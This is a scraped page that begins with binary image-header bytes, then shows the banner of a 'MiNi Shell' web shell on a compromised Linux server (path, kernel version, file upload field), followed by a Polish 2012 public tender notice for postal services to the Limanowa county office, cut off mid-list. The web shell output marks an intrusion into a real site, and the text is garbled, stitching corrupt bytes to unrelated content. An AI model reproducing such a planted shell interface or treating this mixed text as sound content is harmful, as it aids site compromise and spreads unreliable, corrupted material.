JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121206/258981-N-2012.html

<p class="kh_header"><b>Limanowa: Świadczenie usług pocztowych na potrzeby Starostwa Powiatowego w Limanowej oraz Oddziału Zamiejscowego w Mszanie Dolnej w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych oraz ich ewentualnych zwrotów, 
w obrocie krajowym i zagranicznym</b><br>
<b>Numer ogłoszenia: 258981 - 2012; data zamieszczenia: 06.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Limanowej , ul. Józefa Marka 9, 34-600 Limanowa, woj. małopolskie, tel. 18 33 37 800, faks 18 33 37 880.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.limanowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pocztowych na potrzeby Starostwa Powiatowego w Limanowej oraz Oddziału Zamiejscowego w Mszanie Dolnej w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych oraz ich ewentualnych zwrotów, 
w obrocie krajowym i zagranicznym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług pocztowych na potrzeby Starostwa Powiatowego w Limanowej oraz Oddziału Zamiejscowego w Mszanie Dolnej w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych oraz ich ewentualnych zwrotów, w obrocie krajowym i zagranicznym.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.11.20.00-4, 64.11.30.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu nie jest przewidziane składanie wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Na potwierdzenie spełniania w/w warunku Wykonawca przedłoży:
a)	Oświadczenie z art. 22 ust. 1 ustawy Pzp
b)	Aktualne zezwolenie Prezesa Urzędu Komunikacji Elektronicznej na wykonywanie działalności pocztowej zgodnie z art. 6 ustawy z dnia 12 czerwca 2003r Prawo pocztowe (Dz. U. z 2008r, Nr 189, poz. 1159 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże w przedłożonym do oferty Wykazie wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, że w okresie ostatnich trzech lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie (z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie) wykonał minimum 1 usługę polegającą na świadczeniu usług pocztowych. 
Spełnienie warunku Wykonawca wykaże przedkładając Wykaz usług wraz z dokumentami potwierdzającymi, ze wykazane usług zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Na potwierdzenie spełniania w/w warunku wykonawca przedłoży oświadczenie z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Na potwierdzenie spełniania w/w warunku wykonawca przedłoży oświadczenie z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Na potwierdzenie spełniania w/w warunku wykonawca przedłoży oświadczenie z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo, jeżeli Wykonawcę reprezentuje pełnomocnik. Pełnomocnictwo powinno być złożone w oryginale lub w formie kopii poświadczonej za zgodność z oryginałem przez notariusza
2. Kalkulacja cenowa dla zadania częściowego nr 1 
3. Kalkulacja cenowa dla zadania częściowego nr 2
4. Kalkulacja cenowa dla zadania częściowego nr 3
5. Kalkulacja cenowa dla zadania częściowego nr 4</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana istotnych postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany. Zmiany umowy nie mogą wykraczać poza zakres świadczenia określony w SIWZ. Zamawiający przewiduje następujące zmiany istotnych postanowień umowy:
1.	Zmiana terminu przewidzianego na wykonanie umowy lub wykonanie poszczególnych elementów zamówienia jest możliwa o czas opóźnienia, jeśli takie opóźnienie wystąpi lub będzie miało wpływ na wykonanie zamówienia w przypadku:
a.	zmian spowodowanych warunkami atmosferycznym, w szczególności klęski żywiołowe, szczególnie niesprzyjające warunki atmosferyczne uniemożliwiające świadczenie usług,
b.	wystąpienia innych przyczyn zewnętrznych niezależnych od Zamawiającego i Wykonawcy, skutkujących niemożliwością realizacji usług lub wykonywania innych czynności przewidzianych umową.
2.	Zmiana sposobu spełnienie świadczenia, w szczególności na skutek zmian technologicznych lub pojawienia się na rynku materiałów lub urządzeń nowszej generacji
3.	Zmiana typu maszyny do frankowania,
4.	Zmiana wysokości cen poszczególnych usług wynikających z Formularzy cenowych na podstawie których sporządzony został załącznik nr 1 do umów, w przypadku gdy nastąpi ona zgodnie z obowiązującymi w tym zakresie przepisami prawa i wewnętrznymi uregulowaniami wykonawcy. W przypadku zmian cen za usługi pocztowe Wykonawca jest zobowiązany dostarczyć Zamawiającemu nowy cennik.
5.	Zmiana cennika na powszechne usługi pocztowe, zatwierdzonego przez Prezesa Urzędu Komunikacji Elektronicznej lub w inny sposób dopuszczony przez obowiązujące przepisy Prawa pocztowego.
6.	Zmiana w zakresie podwykonawcy i zakresu realizowanych przez niego prac jest możliwa za uprzednią zgodą Zamawiającego. Zmiana podmiotów trzecich na etapie realizacji zamówienia na zasobach których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu jest możliwa jeśli nowy podwykonawca wykaże spełniane warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca. 
7.	Zakres rzeczowy zamówienia określony umową może zostać ograniczony przez Zamawiającego bez skutków finansowych i prawnych dla Zamawiającego, w przypadku gdy wykonanie przedmiotu zamówienia w pełnym zakresie nie leży w interesie publicznym czego nie można było wcześniej przewidzieć.
8.	Rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy - w takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami. 
9.	Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
a.	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ,
b.	zmianie uległy przepisy prawne istotne dla realizacji przedmiotu umowy,
c.	zmiany dotyczące terminów płatności,
d.	zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy,
e.	zmianie uległy stawki podatku VAT (Zamawiający przewiduje możliwość zmiany wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT),
f.	zmiana miejsca spełnienia świadczenia,
g.	inne zmiany korzystne dla Zamawiającego w następstwie okoliczności których nie można było przewidzieć w chwili zawarcia umowy.
18.7.	Dopuszczalne są wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się zamówienie ani na wynik postępowania. Takimi zmianami są zmiany o charakterze administracyjno - organizacyjnym umowy np. zmiany nr konta bankowego, dotyczące nazwy, siedziby Wykonawcy lub jego formy organizacyjno - prawnej w trakcie trwania umowy, innych danych identyfikacyjnych, zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w 
Zmiany do umowy może inicjować zarówno Zamawiający jak i Wykonawca składając pisemny wniosek do drugiej strony, zawierający w szczególności opis zmiany i jej uzasadnienia. Zamawiający przewiduje katalog zmian na które może wyrazić zgodę, powyższe nie stanowi jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetargi.propublico.pl/ZamawiajacySzczegoly.aspx?id=178<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, pokój nr 233, II piętro, budynek B.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2012 godzina 10:00, miejsce: Oferty należy składać w siedzibie Zamawiającego, pokój nr: Kancelaria Ogólna Starostwa Powiatowego w Limanowej, I piętro, budynek B.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług pocztowych na potrzeby Starostwa Powiatowego w Limanowej w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych o masie wagowej do 50 gramów oraz ich ewentualnych zwrotów, w obrocie krajowym i zagranicznym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych oraz ich ewentualnych zwrotów, w obrocie krajowym i zagranicznym o wadze do 50 gramów na potrzeby Starostwa Powiatowego w Limanowej.
Szacunkowe dane dotyczące nadawanych przez Zamawiającego przesyłek w ciągu jednego roku zawiera Formularz cenowy dla zadania częściowego nr 1 stanowiący załącznik do SIWZ. Zamawiający zastrzega, że podane dane mają charakter szacunkowy i zastrzega sobie prawo do zmiany ilości przesyłek danego rodzaju w każdym czasie. 
Usługa stanowiąca przedmiot zamówienia obejmuje w szczególności:
1.	przyjmowanie, przemieszczanie i doręczanie przesyłek pocztowych:
a)	przesyłek listowych nierejestrowanych wraz z usługami komplementarnymi i specjalnymi, 
b)	przesyłek listowych rejestrowanych wraz z usługami komplementarnymi i specjalnymi,
w kategoriach przesyłek priorytetowych i ekonomicznych
2.	świadczenie usługi potwierdzenie odbioru
3.	świadczenie usługi przesyłka pobraniowa w obrocie krajowym polegającej na odebraniu od Nadawcy rejestrowanej przesyłki w obrocie krajowym i doręczenie jej adresatowi pod warunkiem uiszczenia przez niego odpowiedniej kwoty podanej przez Wykonawcę. Pobraną kwotę Wykonawca przekazuje na wskazane przez Zamawiającego konto. 
4.	zwrot do siedziby Nadawcy nie dostarczonych przesyłek niezwłocznie po wyczerpaniu możliwości ich doręczenia. 

Wykonawca będzie doręczał do siedziby Zamawiającego pokwitowane przez adresata potwierdzenie odbioru niezwłocznie po dokonaniu doręczenia przesyłki. 

Usługa winna być realizowana na zasadach określonych w szczególności:
1.	Ustawie z dnia 12 czerwca 2003r Prawo pocztowe (Dz. U. z 2008r. 
Nr 189, poz. 1159 z późn. zm.)
2.	Rozporządzeniu Ministra Infrastruktury z dnia 9 stycznia 2004r. w sprawie warunków wykonywania powszechnych usług pocztowych (Dz. U. z 2004r, 
Nr 5, poz. 34 z późn. zm.)

Zamawiający posiada maszyny do frankowania przesyłek listowych MODEL: NEOPOST 5400, nr fabryczny PL/02/F/20680, oraz MODEL: FRANCOTYP- POSTALIA T1000/1, nr fabryczny: 576136. 

Wykonawca zobowiązany jest do posiadania, a w przypadku braku do utworzenia punktu obsługi klienta znajdującego się na terenie miasta Limanowa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.11.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług pocztowych na potrzeby Starostwa Powiatowego w Limanowej w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych o masie wagowej powyżej 50 gramów oraz ich ewentualnych zwrotów, w obrocie krajowym i zagranicznym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych oraz ich ewentualnych zwrotów, w obrocie krajowym i zagranicznym o wadze powyżej 50 gramów na potrzeby Starostwa Powiatowego w Limanowej.
Szacunkowe dane dotyczące nadawanych przez Zamawiającego przesyłek w ciągu jednego roku zawiera Formularz cenowy dla zadania częściowego nr 2 stanowiący załącznik do SIWZ. Zamawiający zastrzega, że podane dane mają charakter szacunkowy i zastrzega sobie prawo do zmiany ilości przesyłek danego rodzaju w każdym czasie. 
Usługa stanowiąca przedmiot zamówienia obejmuje w szczególności:
1.	przyjmowanie, przemieszczanie i doręczanie przesyłek pocztowych:
a)	przesyłek listowych nierejestrowanych wraz z usługami komplementarnymi i specjalnymi, 
b)	przesyłek listowych rejestrowanych wraz z usługami komplementarnymi i specjalnymi
c)	paczek pocztowych wraz z usługami komplementarnymi i specjalnymi 
w kategoriach przesyłek priorytetowych i ekonomicznych
2.	świadczenie usługi potwierdzenie odbioru
3.	świadczenie usługi przesyłka pobraniowa w obrocie krajowym polegającej na odebraniu od Nadawcy rejestrowanej przesyłki w obrocie krajowym i doręczenie jej adresatowi  pod warunkiem uiszczenia przez niego odpowiedniej kwoty podanej przez wykonawcę. Pobraną kwotę Wykonawca przekazuje na wskazane przez Zamawiającego konto. 
4.	zwrot do siedziby Nadawcy nie dostarczonych przesyłek niezwłocznie po wyczerpaniu możliwości ich doręczenia. 

Wykonawca będzie doręczał do siedziby Zamawiającego pokwitowane przez adresata potwierdzenie odbioru niezwłocznie po dokonaniu doręczenia przesyłki. 

Usługa winna być realizowana na zasadach określonych w szczególności w:
1.	Ustawie z dnia 12 czerwca 2003r Prawo pocztowe (Dz. U. z 2008r. 
Nr 189, poz. 1159 z późn. zm.)
2.	Rozporządzeniu Ministra Infrastruktury z dnia 9 stycznia 2004r. w sprawie warunków wykonywania powszechnych usług pocztowych (Dz. U. z 2004r, 
Nr 5, poz. 34 z późn. zm.)

Zamawiający posiada maszyny do frankowania przesyłek listownych MODEL: NEOPOST 5400, nr fabryczny PL/02/F/20680, oraz MODEL: FRANCOTYP- POSTALIA T1000/1, nr fabryczny: 576136. 

Wykonawca zobowiązany jest do posiadania, a w przypadku braku do utworzenia punktu obsługi klienta znajdującego się na terenie miasta Limanowa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.11.20.00-4, 64.11.30.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie usług pocztowych na potrzeby Starostwa Powiatowego w Limanowej - Oddział Zamiejscowy w Mszanie Dolnej w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych o masie wagowej do 50 gramów oraz ich ewentualnych zwrotów, w obrocie krajowym i zagranicznym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych oraz ich ewentualnych zwrotów, w obrocie krajowym i zagranicznym o wadze do 50 gramów na potrzeby Starostwa Powiatowego w Limanowej - Oddział Zamiejscowy w Mszanie Dolnej.
Szacunkowe dane dotyczące nadawanych przez Zamawiającego przesyłek w ciągu jednego roku zawiera Formularz cenowy dla zadania częściowego nr 3 stanowiący załącznik do SIWZ. Zamawiający zastrzega, że podane dane mają charakter szacunkowy i zastrzega sobie prawo do zmiany ilości przesyłek danego rodzaju w każdym czasie. 
Usługa stanowiąca przedmiot zamówienia obejmuje w szczególności:
1.	przyjmowanie, przemieszczanie i doręczanie przesyłek pocztowych:
a)	przesyłek listowych nierejestrowanych wraz z usługami komplementarnymi i specjalnymi, 
b)	przesyłek listowych rejestrowanych wraz z usługami komplementarnymi i specjalnymi
w kategoriach przesyłek priorytetowych i ekonomicznych
